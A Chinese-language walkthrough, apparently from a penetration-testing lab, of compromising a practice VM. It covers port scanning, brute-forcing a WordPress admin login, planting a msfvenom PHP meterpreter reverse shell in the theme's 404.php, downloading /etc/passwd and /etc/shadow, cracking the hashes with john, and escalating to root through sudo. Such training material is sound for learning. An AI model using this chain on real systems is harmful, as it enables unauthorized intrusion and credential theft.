综合实战第一章
暴力破解实战
环境准备
攻击机:kali 192.168.3.134
靶机:marlinspike 192.168.3.157
信息搜集
老规矩
Linux
nmap -sT 192.168.3.0/24

image-20220424211935950
Linux
nmap -p- -A 192.168.3.157

image-20220424212102509
咱们看看80端口

image-20220424212209073
啥也没有,啥也不是
用nikto扫描一下
Linux
nikto -h http://192.168.3.157

image-20220424212453005
ok在浏览器里看一看

image-20220424212609235
一看,是wordpress 做的,有搞头了
wordpress默认后台登录地址是/wp-login.php

image-20220425080347793
尝试暴力破解
在命令行界面
Linux
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set username admin //wordpress默认用户是admin
还需要加一个字典
Linux
set pass_file usr/share/wordlists/dirb/common.txt
set fargeturi http://192.168.3.157/
set rhost 192.168.3.157
run

image-20220425082015316
不好使,还是用burpsuite吧
暴力破解出密码也是admin,登录网站
上传webshell
然后就是在404里面写入木马了
构造webshell
Linux
msfvenom -p php/meterpreter/reverse_tcp lhost= 192.168.3.134 lport=4444 -f raw > /root/msfshell.php
打开msf
Linux
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.3.134
set lport 4444
把构造好的木马复制粘贴进文件里面

image-20220425104228021
上传上去之后执行404.php
base
/wp-content/themes/twentyseventeen/404.php

image-20220425105039512
连上了
可以下载文件
Linux
download /etc/passwd
download /etc/shadow
看一眼奥

image-20220425105336437
把shadow和passwd这俩文件合并起来
Linux
unshadow passwd shadow > crack
然后就可以用john破解密码了
Linux
john crack

image-20220425105726726
提权
剩下的就是快乐的提权了
Linux
shell
python -c 'import pty;pty.spawn("/bin/bash")'
先登录用户
Linux
su - marlinspike

image-20220425110053867
查看一下权限
Linux
sudo -l

image-20220425110146730
三个ALL,可以直接提权到root
Linux
sudo su

image-20220425110701441
成了,结束!